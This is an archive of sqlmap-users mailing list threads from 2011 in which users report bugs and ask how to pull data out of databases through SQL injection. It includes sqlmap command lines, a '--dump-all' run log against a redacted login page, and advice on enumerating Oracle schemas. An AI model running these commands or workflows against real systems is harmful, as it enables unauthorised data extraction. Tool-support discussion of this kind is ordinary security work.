sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Oracle Results

[Miroslav S. <mir...@gm...>]

hi Chris.

Oracle has a rather different "concept" for databases (from dumping
point of view).

data is stored into "schemas" which are the same thing as "users", and
each user has it's tables under the same named schema.

that means that your best best would be to use the:

--tables -D IFSSYS             <--- current user name
and then dump tables from there on

also, be sure that you are using the latest revision from our repository

kr

On Wed, May 25, 2011 at 12:16 PM, Chris Oakley
<chr...@gm...> wrote:
> Hi All
>
> Not a sqlmap question as such, but maybe someone can help.  I've found an
> sqli flaw in a test that has resulted in the following:
>
> ---
> banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 -
> 64bi'
> current user is DBA:    'False'
> current user:    'IFSSYS'
>
> available databases [4]:
> [*] CTXSYS
> [*] IFSSYS
> [*] SYS
> [*] SYSTEM
> ---
>
> These all seem to be system databases.  I don't know enough about Oracle to
> know if 1) they are all sys dbs 2) if there's anywhere I can go from here.
> The content of these databases seems to be all related to privs and such
> within Oracle.  What I'm looking for is the web app data.  Does anyone more
> familiar with Oracle know why it would only be systems databases accessible
> through the sqli flaw?
>
> We can try other tactics later but I was just wondering if this is normal
> from a data extraction point of view with Oracle.  I've dumped a fair amount
> of the data and there's none systems related so far...
>
> Cheers
>
> Chris
>
>
>
> ------------------------------------------------------------------------------
> vRanger cuts backup time in half-while increasing security.
> With the market-leading solution for virtual backup and recovery,
> you get blazing-fast, flexible, and affordable data protection.
> Download your free trial now.
> http://p.sf.net/sfu/quest-d2dcopy1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] Oracle Results

[Chris O. <chr...@gm...>]

Hi All

Not a sqlmap question as such, but maybe someone can help.  I've found an
sqli flaw in a test that has resulted in the following:

---
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 -
64bi'
current user is DBA:    'False'
current user:    'IFSSYS'

available databases [4]:
[*] CTXSYS
[*] IFSSYS
[*] SYS
[*] SYSTEM
---

These all seem to be system databases.  I don't know enough about Oracle to
know if 1) they are all sys dbs 2) if there's anywhere I can go from here.
The content of these databases seems to be all related to privs and such
within Oracle.  What I'm looking for is the web app data.  Does anyone more
familiar with Oracle know why it would only be systems databases accessible
through the sqli flaw?

We can try other tactics later but I was just wondering if this is normal
from a data extraction point of view with Oracle.  I've dumped a fair amount
of the data and there's none systems related so far...

Cheers

Chris

Re: [sqlmap-users] Suffix bug and redirect handling

[Miroslav S. <mir...@gm...>]

hi David, again.

could you please retry with the latest revision and report back.

we've done some changes which could improve the behaviour.

kr

On Mon, May 23, 2011 at 10:15 PM, Miroslav Stampar
<mir...@gm...> wrote:
> hi David.
>
> basically, you are right.
>
> default behavior should be to follow up the redirection.
>
> the real problem is that it wasn't a default thingy in "sqlmap got a
> 302 redirect to" and we all know that people just like to press Enter
> when running sqlmap and we like to make "dummy click-click yeaa" users
> :)
>
> will do some changes
>
> kr
>
> On Mon, May 23, 2011 at 9:59 PM, Miroslav Stampar
> <mir...@gm...> wrote:
>> hi David.
>>
>> that suffix thingy should be fixed with the latest commit. please
>> retry and report back.
>>
>> about that 302. well, generally it works, but still, maybe it needs
>> little glancing up. it would be great if you could provide with some
>> more information (privately).
>>
>> kr
>>
>> On Mon, May 23, 2011 at 6:23 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> hi David.
>>>
>>> we'll deal with both issues shortly (today or tomorrow) and keep you posted.
>>>
>>> kr
>>>
>>> On Mon, May 23, 2011 at 5:17 PM, David Taylor
>>> <dav...@gm...> wrote:
>>>> Hi all,
>>>> I am new to the list, so can I first say a massive thank you to everybody
>>>> that has contributed to the development of this tool; it is awesome.
>>>> I have come across a couple of issues with the current version of the tool.
>>>> First, trailing whitespace seems to be stripped from the end of --suffix
>>>> parameters.  I have a blind injection point that requires " -- " as a
>>>> terminator.  If I give the tool --suffix " -- ", this gets turned into
>>>> "%20--" in the injection, which doesn't work since the trailing space is
>>>> missing.  I've worked around this by appending some extra non-space
>>>> characters (--suffix " -- xx"), which works, but shouldn't be necessary.
>>>> And second, I don't quite understand how the redirect handling works.  The
>>>> same blind injection point I mention above is on a login page.  If I don't
>>>> try to inject, or if the injection equates to false, I get a HTTP 200 return
>>>> code, with a "login failed" message.  If the injection equates to true, the
>>>> application 302's me to another page.
>>>> I get the message "sqlmap got a 302 redirect to...", asking me if I want to
>>>> re-target.  In this instance, I don't want to choose a new target.  I know
>>>> the bsql vuln exists; I just want to use sqlmap to leverage it.  However if
>>>> I hit enter to select the default (keep same target), sqlmap doesn't detect
>>>> the injection point.
>>>> I have also tried providing a --string parameter, but this doesn't affect
>>>> the result.
>>>> Could we please have some way to blindly follow redirects, and compare the
>>>> eventual result page to that retrieved for other injections?
>>>> Thanks again,
>>>> Dave
>>>> ------------------------------------------------------------------------------
>>>> What Every C/C++ and Fortran developer Should Know!
>>>> Read this article and learn how Intel has extended the reach of its
>>>> next-generation tools to help Windows* and Linux* C/C++ and Fortran
>>>> developers boost performance applications - including clusters.
>>>> http://p.sf.net/sfu/intel-dev2devmay
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail: miroslav.stampar (at) gmail.com
>>> PGP Key ID: 0xB5397B1B
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

Re: [sqlmap-users] Suffix bug and redirect handling

[Miroslav S. <mir...@gm...>]

hi David.

basically, you are right.

default behavior should be to follow up the redirection.

the real problem is that it wasn't a default thingy in "sqlmap got a
302 redirect to" and we all know that people just like to press Enter
when running sqlmap and we like to make "dummy click-click yeaa" users
:)

will do some changes

kr

On Mon, May 23, 2011 at 9:59 PM, Miroslav Stampar
<mir...@gm...> wrote:
> hi David.
>
> that suffix thingy should be fixed with the latest commit. please
> retry and report back.
>
> about that 302. well, generally it works, but still, maybe it needs
> little glancing up. it would be great if you could provide with some
> more information (privately).
>
> kr
>
> On Mon, May 23, 2011 at 6:23 PM, Miroslav Stampar
> <mir...@gm...> wrote:
>> hi David.
>>
>> we'll deal with both issues shortly (today or tomorrow) and keep you posted.
>>
>> kr
>>
>> On Mon, May 23, 2011 at 5:17 PM, David Taylor
>> <dav...@gm...> wrote:
>>> Hi all,
>>> I am new to the list, so can I first say a massive thank you to everybody
>>> that has contributed to the development of this tool; it is awesome.
>>> I have come across a couple of issues with the current version of the tool.
>>> First, trailing whitespace seems to be stripped from the end of --suffix
>>> parameters.  I have a blind injection point that requires " -- " as a
>>> terminator.  If I give the tool --suffix " -- ", this gets turned into
>>> "%20--" in the injection, which doesn't work since the trailing space is
>>> missing.  I've worked around this by appending some extra non-space
>>> characters (--suffix " -- xx"), which works, but shouldn't be necessary.
>>> And second, I don't quite understand how the redirect handling works.  The
>>> same blind injection point I mention above is on a login page.  If I don't
>>> try to inject, or if the injection equates to false, I get a HTTP 200 return
>>> code, with a "login failed" message.  If the injection equates to true, the
>>> application 302's me to another page.
>>> I get the message "sqlmap got a 302 redirect to...", asking me if I want to
>>> re-target.  In this instance, I don't want to choose a new target.  I know
>>> the bsql vuln exists; I just want to use sqlmap to leverage it.  However if
>>> I hit enter to select the default (keep same target), sqlmap doesn't detect
>>> the injection point.
>>> I have also tried providing a --string parameter, but this doesn't affect
>>> the result.
>>> Could we please have some way to blindly follow redirects, and compare the
>>> eventual result page to that retrieved for other injections?
>>> Thanks again,
>>> Dave
>>> ------------------------------------------------------------------------------
>>> What Every C/C++ and Fortran developer Should Know!
>>> Read this article and learn how Intel has extended the reach of its
>>> next-generation tools to help Windows* and Linux* C/C++ and Fortran
>>> developers boost performance applications - including clusters.
>>> http://p.sf.net/sfu/intel-dev2devmay
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

Re: [sqlmap-users] Suffix bug and redirect handling

[Miroslav S. <mir...@gm...>]

hi David.

that suffix thingy should be fixed with the latest commit. please
retry and report back.

about that 302. well, generally it works, but still, maybe it needs
little glancing up. it would be great if you could provide with some
more information (privately).

kr

On Mon, May 23, 2011 at 6:23 PM, Miroslav Stampar
<mir...@gm...> wrote:
> hi David.
>
> we'll deal with both issues shortly (today or tomorrow) and keep you posted.
>
> kr
>
> On Mon, May 23, 2011 at 5:17 PM, David Taylor
> <dav...@gm...> wrote:
>> Hi all,
>> I am new to the list, so can I first say a massive thank you to everybody
>> that has contributed to the development of this tool; it is awesome.
>> I have come across a couple of issues with the current version of the tool.
>> First, trailing whitespace seems to be stripped from the end of --suffix
>> parameters.  I have a blind injection point that requires " -- " as a
>> terminator.  If I give the tool --suffix " -- ", this gets turned into
>> "%20--" in the injection, which doesn't work since the trailing space is
>> missing.  I've worked around this by appending some extra non-space
>> characters (--suffix " -- xx"), which works, but shouldn't be necessary.
>> And second, I don't quite understand how the redirect handling works.  The
>> same blind injection point I mention above is on a login page.  If I don't
>> try to inject, or if the injection equates to false, I get a HTTP 200 return
>> code, with a "login failed" message.  If the injection equates to true, the
>> application 302's me to another page.
>> I get the message "sqlmap got a 302 redirect to...", asking me if I want to
>> re-target.  In this instance, I don't want to choose a new target.  I know
>> the bsql vuln exists; I just want to use sqlmap to leverage it.  However if
>> I hit enter to select the default (keep same target), sqlmap doesn't detect
>> the injection point.
>> I have also tried providing a --string parameter, but this doesn't affect
>> the result.
>> Could we please have some way to blindly follow redirects, and compare the
>> eventual result page to that retrieved for other injections?
>> Thanks again,
>> Dave
>> ------------------------------------------------------------------------------
>> What Every C/C++ and Fortran developer Should Know!
>> Read this article and learn how Intel has extended the reach of its
>> next-generation tools to help Windows* and Linux* C/C++ and Fortran
>> developers boost performance applications - including clusters.
>> http://p.sf.net/sfu/intel-dev2devmay
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

Re: [sqlmap-users] Suffix bug and redirect handling

[Miroslav S. <mir...@gm...>]

hi David.

we'll deal with both issues shortly (today or tomorrow) and keep you posted.

kr

On Mon, May 23, 2011 at 5:17 PM, David Taylor
<dav...@gm...> wrote:
> Hi all,
> I am new to the list, so can I first say a massive thank you to everybody
> that has contributed to the development of this tool; it is awesome.
> I have come across a couple of issues with the current version of the tool.
> First, trailing whitespace seems to be stripped from the end of --suffix
> parameters.  I have a blind injection point that requires " -- " as a
> terminator.  If I give the tool --suffix " -- ", this gets turned into
> "%20--" in the injection, which doesn't work since the trailing space is
> missing.  I've worked around this by appending some extra non-space
> characters (--suffix " -- xx"), which works, but shouldn't be necessary.
> And second, I don't quite understand how the redirect handling works.  The
> same blind injection point I mention above is on a login page.  If I don't
> try to inject, or if the injection equates to false, I get a HTTP 200 return
> code, with a "login failed" message.  If the injection equates to true, the
> application 302's me to another page.
> I get the message "sqlmap got a 302 redirect to...", asking me if I want to
> re-target.  In this instance, I don't want to choose a new target.  I know
> the bsql vuln exists; I just want to use sqlmap to leverage it.  However if
> I hit enter to select the default (keep same target), sqlmap doesn't detect
> the injection point.
> I have also tried providing a --string parameter, but this doesn't affect
> the result.
> Could we please have some way to blindly follow redirects, and compare the
> eventual result page to that retrieved for other injections?
> Thanks again,
> Dave
> ------------------------------------------------------------------------------
> What Every C/C++ and Fortran developer Should Know!
> Read this article and learn how Intel has extended the reach of its
> next-generation tools to help Windows* and Linux* C/C++ and Fortran
> developers boost performance applications - including clusters.
> http://p.sf.net/sfu/intel-dev2devmay
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] Suffix bug and redirect handling

[David T. <dav...@gm...>]

Hi all,

I am new to the list, so can I first say a massive thank you to everybody
that has contributed to the development of this tool; it is awesome.

I have come across a couple of issues with the current version of the tool.

First, trailing whitespace seems to be stripped from the end of --suffix
parameters.  I have a blind injection point that requires " -- " as a
terminator.  If I give the tool --suffix " -- ", this gets turned into
"%20--" in the injection, which doesn't work since the trailing space is
missing.  I've worked around this by appending some extra non-space
characters (--suffix " -- xx"), which works, but shouldn't be necessary.

And second, I don't quite understand how the redirect handling works.  The
same blind injection point I mention above is on a login page.  If I don't
try to inject, or if the injection equates to false, I get a HTTP 200 return
code, with a "login failed" message.  If the injection equates to true, the
application 302's me to another page.
I get the message "sqlmap got a 302 redirect to...", asking me if I want to
re-target.  In this instance, I don't want to choose a new target.  I know
the bsql vuln exists; I just want to use sqlmap to leverage it.  However if
I hit enter to select the default (keep same target), sqlmap doesn't detect
the injection point.
I have also tried providing a --string parameter, but this doesn't affect
the result.
Could we please have some way to blindly follow redirects, and compare the
eventual result page to that retrieved for other injections?

Thanks again,
Dave

Re: [sqlmap-users] Bug in 0.6.4

[Miroslav S. <mir...@gm...>]

Hi Graziano.

"I use the last svn versione of sqlmap, downloaded in day 21/5/2011."
:))))))

Which SVN server do you use?

Current stable version is 0.9 and development one is 1.0-dev, while
you are using "0.6" :))))

Maybe you've downloaded correctly the sqlmap from our repository but
you are using some other version.

You've typed "sqlmap" which most probably calls some other installed
version, while if you try "python sqlmap.py" inside that directory
you'll be able to use the correct one.

kr

p.s. to check out the latest revision from our repository please use:
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

On 5/21/11, Graziano Felline <scr...@gm...> wrote:
> radoen@vaio:~/sqlmap/NUOVO/sqlmap-dev$ sqlmap
> --proxy=http://127.0.0.1:8118 --dump-all   -u
> "http://xxxx.xxxx-xxxx.it/login.aspx?ReturnUrl=%2fDefault.aspx%3fcs%3d888%26al%3d0&cs=888&al=0"
>
>     sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
>                       and Daniele Bellucci <dan...@gm...>
>
> [*] starting at: 17:48:56
>
> [17:48:56] [INFO] testing connection to the target url
> [17:49:26] [WARNING] unable to connect to the target url or proxy,
> sqlmap is going to retry the request
> [17:49:40] [INFO] testing if the url is stable, wait a few seconds
> [17:49:51] [INFO] url is stable
> [17:49:51] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [17:49:55] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [17:49:55] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is dynamic
> [17:49:59] [WARNING] Cookie parameter 'ASP.NET_SessionId' is not dynamic
> [17:49:59] [INFO] testing if GET parameter 'cs' is dynamic
> [17:50:05] [INFO] confirming that GET parameter 'cs' is dynamic
> [17:50:15] [INFO] GET parameter 'cs' is dynamic
> [17:50:15] [INFO] testing sql injection on GET parameter 'cs' with 0
> parenthesis
> [17:50:15] [INFO] testing unescaped numeric injection on GET parameter 'cs'
> [17:50:49] [WARNING] unable to connect to the target url or proxy,
> sqlmap is going to retry the request
> [17:51:20] [INFO] confirming unescaped numeric injection on GET parameter
> 'cs'
> [17:51:25] [INFO] GET parameter 'cs' is unescaped numeric injectable
> with 0 parenthesis
> [17:51:25] [INFO] testing if GET parameter 'al' is dynamic
> [17:51:29] [WARNING] GET parameter 'al' is not dynamic
> [17:51:29] [INFO] testing for parenthesis on injectable parameter
> [17:51:44] [INFO] the injectable parameter requires 0 parenthesis
> [17:51:44] [INFO] testing MySQL
> [17:51:53] [WARNING] the back-end DMBS is not MySQL
> [17:51:53] [INFO] testing Oracle
> [17:52:06] [WARNING] the back-end DMBS is not Oracle
> [17:52:06] [INFO] testing PostgreSQL
> [17:52:11] [WARNING] the back-end DMBS is not PostgreSQL
> [17:52:11] [INFO] testing Microsoft SQL Server
> [17:52:16] [INFO] confirming Microsoft SQL Server
> [17:52:29] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003 or 2008
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
> back-end DBMS: Microsoft SQL Server 2005
>
> [17:52:29] [INFO] fetching tables
> [17:52:29] [INFO] fetching database names
> [17:52:29] [INFO] fetching number of databases
> [17:52:29] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
> [17:52:29] [INFO] retrieved: [17:52:29] [ERROR] unhandled exception in
> sqlmap/0.6.4, please copy the command line and the following text and
> send by e-mail to sql...@li.... The developers
> will fix it as soon as possible:
>
> sqlmap version: 0.6.4
> Python version: 2.7.1+
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 81, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 255, in start
>     action()
>   File "/usr/share/sqlmap/lib/controller/action.py", line 120, in action
>     conf.dbmsHandler.dumpAll()
>   File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 1043, in
> dumpAll
>     self.cachedTables = self.getTables()
>   File "/usr/share/sqlmap/plugins/dbms/mssqlserver.py", line 233, in
> getTables
>     dbs = self.getDbs()
>   File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 623, in
> getDbs
>     count = inject.getValue(query, inband=False, expected="int")
>   File "/usr/share/sqlmap/lib/request/inject.py", line 364, in getValue
>     value = __goInferenceProxy(expression, fromUser, expected)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 297, in
> __goInferenceProxy
>     outputs = __goInferenceFields(expression, expressionFields,
> expressionFieldsList, payload, expected)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 100, in
> __goInferenceFields
>     output = __goInference(payload, expressionReplaced)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 60, in __goInference
>     count, value = bisection(payload, expression, length=length)
>   File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line
> 231, in bisection
>     val = getChar(index)
>   File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line
> 101, in getChar
>     forgedPayload = payload % (expressionUnescaped, idx, limit)
> TypeError: not enough arguments for format string
>
> [*] shutting down at: 17:52:29
>
>
> I use the last svn versione of sqlmap, downloaded in day 21/5/2011.
>
> Good work
> Radoen
>
> ------------------------------------------------------------------------------
> What Every C/C++ and Fortran developer Should Know!
> Read this article and learn how Intel has extended the reach of its
> next-generation tools to help Windows* and Linux* C/C++ and Fortran
> developers boost performance applications - including clusters.
> http://p.sf.net/sfu/intel-dev2devmay
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>


-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] Bug in 0.6.4

[Graziano F. <scr...@gm...>]

radoen@vaio:~/sqlmap/NUOVO/sqlmap-dev$ sqlmap
--proxy=http://127.0.0.1:8118 --dump-all   -u
"http://xxxx.xxxx-xxxx.it/login.aspx?ReturnUrl=%2fDefault.aspx%3fcs%3d888%26al%3d0&cs=888&al=0"

    sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
                      and Daniele Bellucci <dan...@gm...>

[*] starting at: 17:48:56

[17:48:56] [INFO] testing connection to the target url
[17:49:26] [WARNING] unable to connect to the target url or proxy,
sqlmap is going to retry the request
[17:49:40] [INFO] testing if the url is stable, wait a few seconds
[17:49:51] [INFO] url is stable
[17:49:51] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[17:49:55] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[17:49:55] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is dynamic
[17:49:59] [WARNING] Cookie parameter 'ASP.NET_SessionId' is not dynamic
[17:49:59] [INFO] testing if GET parameter 'cs' is dynamic
[17:50:05] [INFO] confirming that GET parameter 'cs' is dynamic
[17:50:15] [INFO] GET parameter 'cs' is dynamic
[17:50:15] [INFO] testing sql injection on GET parameter 'cs' with 0 parenthesis
[17:50:15] [INFO] testing unescaped numeric injection on GET parameter 'cs'
[17:50:49] [WARNING] unable to connect to the target url or proxy,
sqlmap is going to retry the request
[17:51:20] [INFO] confirming unescaped numeric injection on GET parameter 'cs'
[17:51:25] [INFO] GET parameter 'cs' is unescaped numeric injectable
with 0 parenthesis
[17:51:25] [INFO] testing if GET parameter 'al' is dynamic
[17:51:29] [WARNING] GET parameter 'al' is not dynamic
[17:51:29] [INFO] testing for parenthesis on injectable parameter
[17:51:44] [INFO] the injectable parameter requires 0 parenthesis
[17:51:44] [INFO] testing MySQL
[17:51:53] [WARNING] the back-end DMBS is not MySQL
[17:51:53] [INFO] testing Oracle
[17:52:06] [WARNING] the back-end DMBS is not Oracle
[17:52:06] [INFO] testing PostgreSQL
[17:52:11] [WARNING] the back-end DMBS is not PostgreSQL
[17:52:11] [INFO] testing Microsoft SQL Server
[17:52:16] [INFO] confirming Microsoft SQL Server
[17:52:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

[17:52:29] [INFO] fetching tables
[17:52:29] [INFO] fetching database names
[17:52:29] [INFO] fetching number of databases
[17:52:29] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
[17:52:29] [INFO] retrieved: [17:52:29] [ERROR] unhandled exception in
sqlmap/0.6.4, please copy the command line and the following text and
send by e-mail to sql...@li.... The developers
will fix it as soon as possible:

sqlmap version: 0.6.4
Python version: 2.7.1+
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 81, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 255, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 120, in action
    conf.dbmsHandler.dumpAll()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 1043, in dumpAll
    self.cachedTables = self.getTables()
  File "/usr/share/sqlmap/plugins/dbms/mssqlserver.py", line 233, in getTables
    dbs = self.getDbs()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 623, in getDbs
    count = inject.getValue(query, inband=False, expected="int")
  File "/usr/share/sqlmap/lib/request/inject.py", line 364, in getValue
    value = __goInferenceProxy(expression, fromUser, expected)
  File "/usr/share/sqlmap/lib/request/inject.py", line 297, in
__goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields,
expressionFieldsList, payload, expected)
  File "/usr/share/sqlmap/lib/request/inject.py", line 100, in
__goInferenceFields
    output = __goInference(payload, expressionReplaced)
  File "/usr/share/sqlmap/lib/request/inject.py", line 60, in __goInference
    count, value = bisection(payload, expression, length=length)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line
231, in bisection
    val = getChar(index)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line
101, in getChar
    forgedPayload = payload % (expressionUnescaped, idx, limit)
TypeError: not enough arguments for format string

[*] shutting down at: 17:52:29


I use the last svn versione of sqlmap, downloaded in day 21/5/2011.

Good work
Radoen

Re: [sqlmap-users] another unicode error

[Miroslav S. <mir...@gm...>]

hi.

"Also, a lot of arabic data is coming down as ?????? instead of the
Unicode data"
-this can be a problem caused by either:
A) wrong (non-standard) charset used by the web page
B) different charsets for the page (e.g. some arabic) and the database
connector (e.g. latin1) (most often this is the main cause)
C) inability of the console used to display proper characters
D) something else, maybe related to that last commit

kr

On Sun, May 15, 2011 at 10:55 PM, Devon Mitchell
<dev...@ya...> wrote:
> Here's another example.  Also, a lot of arabic data is coming down as ??????
> instead of the Unicode data.  Some works, some doesn't.  At any rate, here
> is the debug data:
> sqlmap version: 1.0-dev (r3893)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py -u ********************************** -D *********
> -T **** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
>     action()
>   File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in
> dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in
> unionUse
>     output = __oneShotUnionUse(limitedExpr, unpack)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in
> __oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, silent=silent, method=method,
> auxHeaders=auxHeaders, response=response, raise404=raise404,
> ignoreTimeout=timeBasedCompare)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
>     page = decodePage(page,
> responseHeaders.get(HTTPHEADER.CONTENT_ENCODING),
> responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
>   File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
>     page = getUnicode(page, kb.pageEncoding)
>   File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
>     return unicode(value, encoding or UNICODE_ENCODING,
> errors="xmlcharrefreplace")
> TypeError: don't know how to handle UnicodeDecodeError in error callback
>
> ------------------------------------------------------------------------------
> Achieve unprecedented app performance and reliability
> What every C/C++ and Fortran developer should know.
> Learn how Intel has extended the reach of its next-generation tools
> to help boost performance applications - inlcuding clusters.
> http://p.sf.net/sfu/intel-dev2devmay
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

Re: [sqlmap-users] error with unicode data

[Miroslav S. <mir...@gm...>]

hi Devon.

could you please try to update to the latest revision and report back?
i believe i've found the faulty part.

kr

On Sun, May 15, 2011 at 10:53 PM, Devon Mitchell
<dev...@ya...> wrote:
> I've been having a lot of these recently:
> sqlmap version: 1.0-dev (r3893)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py -u ************************** -D ************ -T
> *** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
>     action()
>   File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in
> dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in
> unionUse
>     output = __oneShotUnionUse(limitedExpr, unpack)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in
> __oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, silent=silent, method=method,
> auxHeaders=auxHeaders, response=response, raise404=raise404,
> ignoreTimeout=timeBasedCompare)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
>     page = decodePage(page,
> responseHeaders.get(HTTPHEADER.CONTENT_ENCODING),
> responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
>   File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
>     page = getUnicode(page, kb.pageEncoding)
>   File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
>     return unicode(value, encoding or UNICODE_ENCODING,
> errors="xmlcharrefreplace")
> TypeError: don't know how to handle UnicodeDecodeError in error callback
>
> ------------------------------------------------------------------------------
> Achieve unprecedented app performance and reliability
> What every C/C++ and Fortran developer should know.
> Learn how Intel has extended the reach of its next-generation tools
> to help boost performance applications - inlcuding clusters.
> http://p.sf.net/sfu/intel-dev2devmay
